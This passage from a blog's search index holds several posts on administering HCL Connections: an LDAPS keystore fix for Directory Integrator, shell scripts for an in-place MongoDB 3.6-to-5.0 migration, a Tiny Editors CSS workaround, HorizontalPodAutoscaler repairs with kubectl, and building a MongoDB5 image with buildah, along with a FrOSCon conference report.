check if the credentials and server information were valid. So I set:\nsource_ldap_url=ldap://dc1.win.stoeps.home:389 source_ldap_use_ssl=false Without SSL, I was able to connect to AD LDAP and synchronize the users, but I wanted to get it working with SSL. Starting with some tracing (after enabling SSL again) in solution.properties:\n... javax.net.debug=all Running collect_dns.sh again produces a lot of debug output. The most important part is:\njavax.net.ssl|FINE|1C|Thread-3|2023-11-02 12:36:35.149 UTC|Thread.java:1178|Produced client Certificate handshake message ( \u0026#34;Certificates\u0026#34;: [ \u0026#34;certificate\u0026#34; : { \u0026#34;version\u0026#34; : \u0026#34;v3\u0026#34;, \u0026#34;serial number\u0026#34; : \u0026#34;45 01 B2 CD\u0026#34;, \u0026#34;signature algorithm\u0026#34;: \u0026#34;MD5withRSA\u0026#34;, \u0026#34;issuer\u0026#34; : \u0026#34;CN=API Admin, OU=test, O=test, L=test, ST=test, C=US\u0026#34;, \u0026#34;not before\u0026#34; : \u0026#34;2006-09-08 18:13:33.000 UTC\u0026#34;, \u0026#34;not after\u0026#34; : \u0026#34;2010-09-07 18:13:33.000 UTC\u0026#34;, \u0026#34;subject\u0026#34; : \u0026#34;CN=API Admin, OU=test, O=test, L=test, ST=test, C=US\u0026#34;, \u0026#34;subject public key\u0026#34; : \u0026#34;RSA\u0026#34;} ] I wondered about this user, but after some research and checking serverapi/testadmin.jks, I found an expired API Admin user, and it seems that TDI tries to send his client certificate to the AD LDAP server. AD does not accept the user (because the user is unknown, expired and uses an old signature algorithm).\nWhen we open the file serverapi/testadmin.jks we find an expired user CN=API Admin, OU=test, O=test, ST=test, C=US, but why does TDI try to use this certificate?\nScreenshot with ikeyman Some internet searches later, I found the post from Robert Farstad TDI/SDI - Connect to AD over SSL and Michael Urspringer IBM Connections 4: Connect TDI to Secure LDAP server via SSL .\nBoth added a keystore and a truststore to their tdisol folder, I did just the trustStore. So the keyStore gets inherited from global.properties which points to serverapi/testadmin.jks.\nSolution So I changed my solution.properties to:\n... # Truststore javax.net.ssl.trustStore=ldapcerts.jks {protect}-javax.net.ssl.trustStorePassword={encr}VK/JddYbHYHDbjQ/jO9... javax.net.ssl.trustStoreType=jks # KeyStore (can use the same key store as the trustStore!) javax.net.ssl.keyStore=ldapcerts.jks {protect}-javax.net.ssl.keyStorePassword={encr}VK/JddYbHYHDbjQ/jO9... javax.net.ssl.keyStoreType=jks and ran collect_dns.sh again. Now the collect.dns gets created and contains users, and the next check with sync_all_dns.sh is successfully synchronizing the AD users to Connections profilesDB.\nI assume that AD asks optionally for a client certificate, and as there is one present in the keystore, TDI tries to send it.\n","excerpt":"\u003cp\u003eI had one Connections\u0026rsquo; environment that I wanted to switch from OpenLDAP to Active Directory LDAP. The old OpenLDAP environment used LDAPS to connect, and so I assumed that the change was done quickly.\u003c/p\u003e\n\u003cp\u003eThe first step was to make a copy of the tdisol folder I used for OpenLDAP and start changing the configuration files for the new LDAP server.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/sdi-connect-to-ad-ldaps/","title":"Security Directory Integrator connecting to Active Directory LDAPS"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tdi/","title":"Tdi"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tdi/","title":"Tdi,"},{"body":"The official documentation, \u0026ldquo;Migrating data from MongoDB 3 to 5\u0026rdquo;, wants to dump the MongoDB databases in 3.6 and then restore this data into the newly deployed MongoDB 5.\nOne issue with this process is that we can\u0026rsquo;t run the two MongoDB versions in parallel on Kubernetes because the provided helm charts and container for MongoDB 3.6 stop running after Kubernetes 1.21. On the other side, the helm chart providing MongoDB 5 can\u0026rsquo;t be installed on those old Kubernetes versions. So the process to update is:\nMigration process Dump databases in MongoDB 3.6 (version delivered with Connections 7) Update Kubernetes to 1.25 or 1.27 Restore MongoDB databases to version 5.0 So, you have to plan the process in advance because it is difficult to get the data when you forget something.\nUpdate Kubernetes The process of updating Kubernetes from 1.21 to 1.27 is quite a challenge because you have to jump from version to version: 1.21 → 1.22 → 1.23 → 1.24 → 1.25 → 1.26 → 1.27. Or you destroy your Kubernetes deployment and just create a new one with Kubernetes 1.27.\nCreate database dumps I started dumping the databases and found that these 50 GB (it is a large environment) of MongoDB databases will need about three days until the dump is finished. We estimated the restoration to take three to four days. This results in a migration time of at least one week, and there is no migration possible of the data created in the databases during this week. Nobody can shut down their Connections\u0026rsquo; environment for multiple days, so we required another solution.\nA case at HCL wasn\u0026rsquo;t helpful at all, and in the end I started reading the MongoDB documentation and tested some options.\nI learned that we can migrate the data in-place, but the process is updating in a row 3.6 → 4.0 → 4.2 → 4.4 → 5.0. The documentation recommends updating the database binaries, set the compatibility version, shutdown the database and going to the next version. The databases are stored in NFS shares, so in my opinion, the easiest way is to use some Docker containers and mount the database directory to these containers.\nAnother option would be to add new members to the replicaSet, but this would need some code adjustments in the pods. These changes I wanted to avoid and as I already wrote, this would need adjustments in the helm charts deploying MongoDB.\nGet the MongoDB 3.6 data to the 5.0 shares I\u0026rsquo;m not responsible for your data or provide support for this process!\nI tested these steps in multiple environments and until now, everything works flawlessly, but use this information at your own risk!\nMy first try was copying the shares mongo-node-{0,1,2} to the new ones mongo5-node-{0,1,2}, but this means nearly 150 GB of data copied over NFS.\nCopying the database data to a NFS requires some time, so my next step was moving the data from the mongo-node-{0,1,2} shares to mongo5-node-{0,1,2}. Moving data is way faster than copying them, but you should have a backup or snapshot.\nBackup mongo-node shares tar the data of MongoDB, this is faster than copying it.\ncd /pv-connections tar cvzf backup-$date +%Y-%m-%d-mongo36.tar.gz mongo-node-? Move data on NFS share cd /pv-connections for i in 0 1 2 # Backup mongo5 folder if [ -d mongo5-node-${i}]; then mv mongo5-node-${i} mongo5-node-${i}-old fi mv mongo-node-${i} mongo5-node-${i} done Migrate databases I used podman installed on the NFS Server to migrate the databases, but you can mount the shares to any other machine with Docker or podman.\nSteps We have to start with MongoDB 3.6 because Connections 7 has set CompatibiltyVersion = 3.4!\nPull image podman pull docker.io/bitnami/mongodb:3.6 Run container This command expects that you are in the /pv-connections/mongo5-node-0 folder.\npodman run -dt --name mongo36 -p 27017:27017 -v $(pwd)/data/db:/bitnami/mongodb/data/db:Z docker.io/bitnami/mongodb:3.6 Remove the replicaset (only for 3.6) The new statefulSet in MongoDB 5 uses new hostnames, so it is necessary to remove the old hostname from the replicaset.\nI run the following commands via docker or podman exec, but you can use mongosh too and run the commands one after another in shell. I wanted to automate the process, this is easier with single commands via podman exec.\npodman exec -it mongo36 mongo --host 127.0.0.1 --eval \u0026#34;db.getSiblingDB(\u0026#39;local\u0026#39;).system.replset.remove()\u0026#34; Drop userprefs-service database (only for 3.6) This database is no longer used and can be deleted.\npodman exec -it mongo36 mongo --host 127.0.0.1 --eval \u0026#34;use userprefs-service\u0026#34; --eval \u0026#34;db.dropDatabase()\u0026#34; Update CompatibiltyVersion podman exec -it mongo36 mongo --host 127.0.0.1 --eval \u0026#34;db.adminCommand( { setFeatureCompatibilityVersion: \u0026#39;3.6\u0026#39; } )\u0026#34; Shutdown database Server podman exec -it mongo36 mongo --host 127.0.0.1 --eval \u0026#34;db.getSiblingDB(\u0026#39;admin\u0026#39;).shutdownServer()\u0026#34; Stop the container and remove it podman stop mongo36 podman rm mongo36 That\u0026rsquo;s almost it, but you have to do the same process in all 3 mongo5-node-{0,1,2} shares and for the other MongoDB versions.\nUse a Shell Script for the migration This script expects that you already moved the old mongo-node folders to mongo5-node.\nUsing podman #!/usr/bin/env bash # Author: Christoph Stoettner # Date: 2023-09-22 # Copyright: Vegard IT GmbH / Christoph Stoettner # This script expects the mongo 3.6 databases in the mongo5 shares # I recommend to move mongo-node-x to mongo5-node-x because copy needs too long NFS_ROOT=/pv-connections for i in 3.6 4.0 4.2 4.4 5.0; do podman pull docker.io/bitnami/mongodb:${i} container=mongo$(echo $i | tr -d .) for j in 0 1 2; do cd ${NFS_ROOT}/mongo5-node-$j podman run -dt --name ${container} -p 27017:27017 -v $(pwd)/data/db:/bitnami/mongodb/data/db:Z docker.io/bitnami/mongodb:${i} sleep 15 # Update CompatibiltyVersion to next version podman exec -it ${container} mongo --host 127.0.0.1 --eval \u0026#34;db.adminCommand( { setFeatureCompatibilityVersion: \u0026#39;${i}\u0026#39; } )\u0026#34; if [ ${i} -eq \u0026#34;3.6\u0026#34; ] ; then # Remove replicaset definition from database local podman exec -it ${container} mongo --host 127.0.0.1 --eval \u0026#34;db.getSiblingDB(\u0026#39;local\u0026#39;).system.replset.remove()\u0026#34; podman exec -it ${container} mongo --host 127.0.0.1 --eval \u0026#34;use userprefs-service\u0026#34; --eval \u0026#34;db.dropDatabase()\u0026#34; fi # Stop mongodb databases podman exec -it ${container} mongo --host 127.0.0.1 --eval \u0026#34;db.getSiblingDB(\u0026#39;admin\u0026#39;).shutdownServer()\u0026#34; podman stop ${container} podman rm ${container} done done Using Docker #!/usr/bin/env bash # Author: Christoph Stoettner # Copyright: Vegard IT GmbH # Date: 2023-09-21 # This script expects the MongoDB 3.6 databases in the mongo5 shares # I recommend to move mongo-node-x to mongo5-node-x, because copy needs too long NFS_ROOT=/pv-connections for i in 3.6 4.0 4.2 4.4 5.0; do docker pull bitnami/mongodb:${i} container=mongo$(echo $i | tr -d .) for j in 0 1 2; do cd ${NFS_ROOT}/mongo5-node-$j || exit echo \u0026#34;[Start ${i}] - Start container ${container} in mongo5-node-${j}\u0026#34; docker run -d -t --name \u0026#34;${container}\u0026#34; -p 27017:27017 -v \u0026#34;$(pwd)/data/db\u0026#34;:/bitnami/mongodb/data/db bitnami/mongodb:${i} sleep 30 CMD=mongosh if [ ${i} == \u0026#34;3.6\u0026#34; ] ; then # Image 3.6 has no mongosh CMD=mongo elif [ ${i} == \u0026#34;4.0\u0026#34; ]; then # Image 4.0 has no mongosh CMD=mongo elif [ ${i} == \u0026#34;4.2\u0026#34; ]; then # Delete database userprefs-service echo \u0026#34;Delete database userprefs-service\u0026#34; docker exec \u0026#34;${container}\u0026#34; $CMD userprefs-service --quiet --eval \u0026#39;db.dropDatabase(); quit();\u0026#39; echo \u0026#34;Delete ReplicaSet\u0026#34; docker exec \u0026#34;${container}\u0026#34; $CMD local --quiet --eval \u0026#39;db.system.replset.deleteOne({\u0026#34;_id\u0026#34;:\u0026#34;rs0\u0026#34;}); quit();\u0026#39; echo \u0026#34;Delete Transactions\u0026#34; docker exec \u0026#34;${container}\u0026#34; $CMD config --quiet --eval \u0026#39;db.transactions.remove({}); quit();\u0026#39; fi # Update CompatibiltyVersion to next version until docker exec \u0026#34;${container}\u0026#34; $CMD --quiet --eval \u0026#34;db.adminCommand( { setFeatureCompatibilityVersion: \u0026#39;${i}\u0026#39; } )\u0026#34;; do echo \u0026#34;Update FeatureCompatibilityVersion to ${i}\u0026#34; echo \u0026#34;Remove transactions\u0026#34; docker exec \u0026#34;${container}\u0026#34; $CMD config --quiet --eval \u0026#39;db.transactions.remove({}); quit();\u0026#39; sleep 10 done # Stop mongodb databases echo \u0026#34;Stop mongod\u0026#34; if [ ${i} == \u0026#34;3.6\u0026#34; ] || [ ${i} == \u0026#34;4.0\u0026#34; ]; then docker exec \u0026#34;${container}\u0026#34; $CMD --quiet --eval \u0026#34;db.getSiblingDB(\u0026#39;admin\u0026#39;).shutdownServer()\u0026#34; else docker exec \u0026#34;${container}\u0026#34; $CMD admin --quiet --eval \u0026#39;db.shutdownServer(); quit();\u0026#39; fi echo \u0026#34;Stop container ${container} in mongo5-node-${j}\u0026#34; docker stop \u0026#34;${container}\u0026#34; echo \u0026#34;Delete container\u0026#34; docker rm \u0026#34;${container}\u0026#34; done echo \u0026#34;[Stop ${i}] - All datastores updated\u0026#34; done After running this script, just follow the documented migration path and install/update Kubernetes and Component Pack.\nJust for comparison, this process with podman pull command (download the Bitnami images from Docker Hub) runs about 15 to 20 minutes and the 50 GB databases are migrated. After starting the new Mongo5 statefulset, the replicaSet config is automatically reapplied and working.\n","excerpt":"\u003cp\u003eThe \u003ca href=\"https://opensource.hcltechsw.com/connections-doc/v8-cr3/admin/install/migrating_data_mongodb_v3_v5.html\" target=\"_blank\"\u003eofficial documentation, \u0026ldquo;Migrating data from MongoDB 3 to 5\u0026rdquo;, \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n wants to dump the MongoDB databases in 3.6 and then restore this data into the newly deployed MongoDB 5.\u003c/p\u003e\n\u003cp\u003eOne issue with this process is that we can\u0026rsquo;t run the two MongoDB versions in parallel on Kubernetes because the provided helm charts and container for MongoDB 3.6 stop running after Kubernetes 1.21. On the other side, the helm chart providing MongoDB 5 can\u0026rsquo;t be installed on those old Kubernetes versions. So the process to update is:\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/migrate-mongodb-data-for-cp/","title":"Migrate MongoDB in HCL Connections Component Pack 8"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/mongodb/","title":"Mongodb"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/mongodb/","title":"Mongodb"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/conference/","title":"Conference"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/conference/","title":"Conference,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/foss/","title":"Foss"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/foss/","title":"Foss,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/froscon/","title":"Froscon"},{"body":"Last week I attended FrOSCon[https://froscon.org], a yearly conference about Free and Open-Source software, organized by the computer science department of the University of Applied Sciences Bonn-Rhein-Sieg.\nI had the honor to do two sessions. This time I did them in German, both are recorded by the marvelous c3voc .\nThis was my forth FroSCon, and it was like coming home. It began with a nice dinner with some new and old friends on the day before the event. The first conference day I had the first slot after the opening session and I felt somehow nervous. But with a very kind introduction by Henning Rohde (Thanks Henning, for the pictures of me during the talk!), it got better, and I started showing my workflow with dot files and package installation.\nDotfiles verwalten My second session about alternatives to table calculation software started with a thread on Mastodon . There I asked for links and stories about how people use Excel or Google sheets for way more than it was intended to be used.\nI got that many responses and links, I couldn\u0026rsquo;t add all of these, but it is a great read. Thanks for all comments in Mastodon and mail.\nWas man besser nicht mit einer Tabellenkalkulation macht During the talk, Sujeevan made this photo. The talk was in HS1/2, the biggest room of the conference. Having a session there is always a bit special.\nPhotographer: Sujeevan Vijayakumaran There were many more talks and I met with other speakers and attendees during the two days. The overall mood was great and we had insightful discussions.\nI can recommend attending FrOSCon to anybody who is interested in Free and Open-Source software! Maybe we see each other there next year.\n","excerpt":"\u003cp\u003eLast week I attended FrOSCon[https://froscon.org], a yearly conference about Free and Open-Source software, organized by the computer science department of the University of Applied Sciences Bonn-Rhein-Sieg.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/froscon2023/","title":"Froscon 2023"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/froscon/","title":"Froscon,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/oss/","title":"Oss"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/oss/","title":"Oss"},{"body":"After updating HCL Connections to 8CR3 and Tiny Editors to 4.9.2.24 the lines of tables are no longer visible during editing.\nHere is the edit form with Tiny Editors 4.8.2.0:\nEdit form with Tiny Editors 4.8.2.0 and table with border=0 When you try the same in Tiny Editors 4.9.2.24 the editor shows just white space, and you have to have a good imagination of the table cells to click into the right one.\nEdit form with Tiny Editors 4.9.2.24 and table with border=0 The CSS classes are still there, so why does the editor hide the borders in edit mode too?\nTable tag in Tiny Editors 4.8.2.0:\n\u0026lt;table dir=\u0026#34;ltr\u0026#34; style=\u0026#34;border-collapse: collapse; width: 100%;\u0026#34; data-mce-style=\u0026#34;border-collapse: collapse; width: 100%;\u0026#34; class=\u0026#34;mce-item-table\u0026#34; border=\u0026#34;0\u0026#34;\u0026gt; Table tag in Tiny Editors 4.9.2.24:\n\u0026lt;table style=\u0026#34;border-collapse: collapse; width: 100%; border-width: 0px;\u0026#34; border=\u0026#34;1\u0026#34;\u0026gt; So the difference is that the new version keeps border=\u0026quot;1\u0026quot; and removes the border with style=...;border-width: 0px;\nThe CSS class that should show the dashed lines is defined as:\n.mce-item-table:not([border]), .mce-item-table:not([border]) caption, .mce-item-table:not([border]) td, .mce-item-table:not([border]) th, .mce-item-table[border=\u0026#34;0\u0026#34;], .mce-item-table[border=\u0026#34;0\u0026#34;] caption, .mce-item-table[border=\u0026#34;0\u0026#34;] td, .mce-item-table[border=\u0026#34;0\u0026#34;] th, table[style*=\u0026#34;border-width: 0px\u0026#34;], table[style*=\u0026#34;border-width: 0px\u0026#34;] caption, table[style*=\u0026#34;border-width: 0px\u0026#34;] td, table[style*=\u0026#34;border-width: 0px\u0026#34;] th { border:1px dashed #bbb; } The CSS rule gets overwritten by the element and needs to be changed.\nEdit form with Tiny Editors 4.9.2.24 and table with border=0 The easiest workaround is to go to your customization folder, edit \u0026lt;shared directory\u0026gt;/customization/javascript/tiny/editors/connections/tiny-editors.css and add this to the end:\n.mce-item-table:not([border]), .mce-item-table:not([border]) caption, .mce-item-table:not([border]) td, .mce-item-table:not([border]) th, .mce-item-table[border=\u0026#34;0\u0026#34;], .mce-item-table[border=\u0026#34;0\u0026#34;] caption, .mce-item-table[border=\u0026#34;0\u0026#34;] td, .mce-item-table[border=\u0026#34;0\u0026#34;] th, table[style*=\u0026#34;border-width: 0px\u0026#34;], table[style*=\u0026#34;border-width: 0px\u0026#34;] caption, table[style*=\u0026#34;border-width: 0px\u0026#34;] td, table[style*=\u0026#34;border-width: 0px\u0026#34;] th { border:1px dashed #bbb !important; } Restart the Common App, and the dashed lines are back in the editor window. ","excerpt":"\u003cp\u003eAfter updating HCL Connections to 8CR3 and Tiny Editors to 4.9.2.24 the lines of tables are no longer visible during editing.\u003c/p\u003e\n\u003cp\u003eHere is the edit form with Tiny Editors 4.8.2.0:\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/tiny-editors-table/","title":"Show table borders during editing in Tiny Editors"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tiny/","title":"Tiny,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tinyeditors/","title":"Tinyeditors"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tinyeditors/","title":"Tinyeditors"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tinymce/","title":"Tinymce,"},{"body":"During a troubleshooting session in Component Pack, I checked the Kubernetes events.\nkubectl get events -n connections 18m Warning FailedGetScale horizontalpodautoscaler/middleware-jsonapi no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; 18m Warning FailedGetScale horizontalpodautoscaler/mwautoscaler no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; 18m Warning FailedGetScale horizontalpodautoscaler/te-creation-wizard no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; 18m Warning FailedGetScale horizontalpodautoscaler/teams-share-service no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; 18m Warning FailedGetScale horizontalpodautoscaler/teams-share-ui no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; 18m Warning FailedGetScale horizontalpodautoscaler/teams-tab-api no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; 18m Warning FailedGetScale horizontalpodautoscaler/teams-tab-ui no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; Or in k9s: So, there are several thousand messages of a failed autoscaler. The documentation does not mention HPA anywhere. So, I checked the Kubernetes documentation: HorizontalPodAutoscaler Walkthrough One prerequisite to using HPA (HorizontalAutoscaler), is the installation of Metrics Server on the Kubernetes cluster.\nInstall Metrics Server https://github.com/kubernetes-sigs/metrics-server#deployment Install with kubectl kubectl apply -f https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/high-availability-1.21+.yaml Install with helm helm repo add metrics-server https://kubernetes-sigs.github.io/metrics-server/ helm upgrade --install metrics-server metrics-server/metrics-server Allow self-signed certificates With my kubeadm deployed Kubernetes servers, I get errors in the metrics-server pods after the helm deployment.\nscraper.go:149] \u0026#34;Failed to scrape node\u0026#34; err=\u0026#34;Get \\\u0026#34;https://10.0.22.95:10250/metrics/resource\\\u0026#34;: tls: failed to verify certificate: x509: cannot validate certificate for 10.0.22.95 because it doesn\u0026#39;t contain any IP SANs\u0026#34; node=\u0026#34;cnx8-db2-cp.stoeps.home\u0026#34; │ So, the certificate does not contain the IP address. A quick fix is described here . Lets add the parameter --kubelet-insecure-tls to the deployment definition of metrics-server:\nkubectl patch deploy metrics-server -n kube-system --type=json \\ -p=\u0026#39;[{\u0026#34;op\u0026#34;: \u0026#34;add\u0026#34;, \u0026#34;path\u0026#34;: \u0026#34;/spec/template/spec/containers/0/args/-\u0026#34;, \u0026#34;value\u0026#34;: \u0026#34;--kubelet-insecure-tls\u0026#34;}]\u0026#39; Now the metrics-server is starting up and works as expected. In k9s we see now the used cpu and memory:\nFix apiVersion Even after the Metrics server is installed, the events still show errors. Therefore, let's check:\nkubectl describe hpa teams-tab-ui -n connections ... Events: Type Reason Age From Message ---- ------ ---- ---- ------- Warning FailedGetScale 27m (x22287 over 3d21h) horizontal-pod-autoscaler no matches for kind \u0026#34;Deployment\u0026#34; in group \u0026#34;extensions\u0026#34; Searching the error message and found: Horizontal Pod Autoscaling failing after upgrading to Google Kubernetes Engine 1.16 with error: no matches for kind \u0026quot;Deployment\u0026quot; in group \u0026quot;extensions\u0026quot; Since Kubernetes 1.16 the HPA configuration needs to be changed from:\n... scaleTargetRef: apiVersion: extensions/v1beta kind: Deployment name: admin-portal ... to\n... scaleTargetRef: apiVersion: apps/v1 kind: Deployment name: admin-portal ... Fix customizer HPA Now most of the HPA are start working, except of the mwautoscaler. Here, the deployment name in scaleTargetRef is wrong and needs to be changed from mwautoscaler to mw-proxy. To adjust the minimum pod count, which is set to 1 in all other HPA, I changed the default 3 to 1 here.\napiVersion: autoscaling/v2 kind: HorizontalPodAutoscaler metadata: annotations: meta.helm.sh/release-name: mw-proxy meta.helm.sh/release-namespace: connections creationTimestamp: \u0026#34;2023-02-08T15:51:28Z\u0026#34; labels: app.kubernetes.io/managed-by: Helm chart: mw-proxy-0.1.0-20230329-171529 environment: \u0026#34;\u0026#34; heritage: Helm name: fsautoscaler release: mw-proxy type: autoscaler name: mwautoscaler namespace: connections resourceVersion: \u0026#34;2105787\u0026#34; uid: 1bf749b4-f4cd-4760-a2e0-357ff0e6772a spec: maxReplicas: 3 metrics: - resource: name: cpu target: averageUtilization: 80 type: Utilization type: Resource minReplicas: 1 scaleTargetRef: apiVersion: apps/v1 kind: Deployment name: mw-proxy status: conditions: - lastTransitionTime: \u0026#34;2023-05-30T10:41:57Z\u0026#34; message: recommended size matches current size reason: ReadyForNewScale status: \u0026#34;True\u0026#34; type: AbleToScale - lastTransitionTime: \u0026#34;2023-05-30T10:41:57Z\u0026#34; message: the HPA was able to successfully calculate a replica count from cpu resource utilization (percentage of request) reason: ValidMetricFound status: \u0026#34;True\u0026#34; type: ScalingActive - lastTransitionTime: \u0026#34;2023-05-30T10:41:57Z\u0026#34; message: the desired count is within the acceptable range reason: DesiredWithinRange status: \u0026#34;False\u0026#34; type: ScalingLimited currentMetrics: - resource: current: averageUtilization: 10 averageValue: 5m name: cpu type: Resource currentReplicas: 1 desiredReplicas: 1 Use kubectl patch to automate the changes # Change apiVersion kubectl patch hpa admin-portal -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa community-template-service -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa middleware-jsonapi -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa te-creation-wizard -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa teams-share-service -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa teams-share-ui -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa teams-tab-api -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; kubectl patch hpa teams-tab-ui -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;}}}\u0026#39; # Change customizer kubectl patch hpa mwautoscaler -n connections -p \u0026#39;{\u0026#34;spec\u0026#34;:{\u0026#34;minReplicas\u0026#34;: 1, \u0026#34;scaleTargetRef\u0026#34;:{\u0026#34;apiVersion\u0026#34;: \u0026#34;apps/v1\u0026#34;,\u0026#34;name\u0026#34;:\u0026#34;mw-proxy\u0026#34;}}}\u0026#39; Working HPA With these changes HPA starts working:\nInteresting to see that the new introduced pod middleware-jsonapi has an HPA configuration, but uses the same old apiVersion as the other ones.\n","excerpt":"\u003cp\u003eDuring a troubleshooting session in Component Pack, I checked the\nKubernetes events.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/hpa/","title":"HorizontalPodAutoscalers (HPA) with HCL Connections Component Pack"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/k8s/","title":"K8s"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/kubernetes/","title":"Kubernetes"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/kubernetes/","title":"Kubernetes"},{"body":"To install the Component Pack for HCL Connections 8, you need to create a Mongodb5 image. The image sources can be found in the HCL MongoDB repository , and the process for creating the image is documented in Installing MongoDB5 for Component Pack 8 . The process involves using Docker, so if you have it installed, you can follow the instructions provided.\nNote that after Kubernetes 1.20, the container engine has been changed to containerd , and Redhat-based systems now prefer podman over Docker. If you want to build container images for podman or Kubernetes/containerd, you can use buildah , which can be installed directly from the official repositories. Installing Docker just for the image creation installs the Docker service and needs resources. Most of the time, buildah is my way to go here.\nPodman can be aliased to docker and you can use all the commands you already know with. One of the differences is that podman doesn\u0026rsquo;t use a service and there is no need to run it as root.\nInstall buildah sudo dnf install buildah Clone Repository git clone https://github.com/HCL-TECH-SOFTWARE/connections-mongo5 Create image cd connections-mongo5 buildah bud -t hclcr.io/cnx/middleware-mongodb5:20230329-171549 . Export image as tar file buildah push --format oci hclcr.io/cnx/middleware-mongodb5:20230329-171549 oci-archive:middleware-mongodb5_20230329-171549.tar Now we can copy the image file to the Kubernetes nodes and import with ctr, or push to a registry.\nctr -n=k8s.io image import --digests=true middleware-mongodb5_20230329-171549.tar Check the imported image:\nctr -n=k8s.io image ls | grep mongodb5 When the image has no tag after importing it, you can tag with ctr:\nctr -n=k8s.io image tag import-2023-05-08@sha256:7d2f5e93a6cebcd29b10b79d5d84f1c41383aaf52db3c14ccd9eff3af7d125d9 \\ hclcr.io/cnx/middleware-mongodb5:20230329-171549 The process is a bit complicated, and when you install with connections-automation you have to run the installation at least twice and the image needs to be imported on each worker node. So, my next task will be a new role to create the image during the installation.\n","excerpt":"\u003cp\u003eTo install the Component Pack for HCL Connections 8, you need to create a Mongodb5 image. The image sources can be found in the \u003ca href=\"https://github.com/HCL-TECH-SOFTWARE/connections-mongo5\" target=\"_blank\"\u003eHCL MongoDB repository \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, and the process for creating the image is documented in \u003ca href=\"https://opensource.hcltechsw.com/connections-doc/v8-cr1/admin/install/installing_mongodb_5_for_component_pack_8.html?h=mongodb5\" target=\"_blank\"\u003eInstalling MongoDB5 for Component Pack 8 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. The process involves using Docker, so if you have it installed, you can follow the instructions provided.\u003c/p\u003e","ref":"https://stoeps.de/posts/2023/buildah-for-cp/","title":"Build mongodb5 image for Component Pack with Buildah"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/buildah/","title":"Buildah"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/containerd/","title":"Containerd"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/k8s/","title":"K8s,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/k9s/","title":"K9s"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/podman/","title":"Podman"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tiu/","title":"Tiu,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tool/","title":"Tool,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/engage/","title":"Engage"},{"body":"This year, Engage took place at the Felix Meritis in Amsterdam . The Engage board (Hilde, Theo and Kris) did a great job and made this very special conference a great success.\nFor Connections enthusiasts the most important session was What to expect from the HCL DX and HCL Connections roadmap . I most liked this slide:\nCopyright © 2023CL Software Limited | Confidential and the next features in 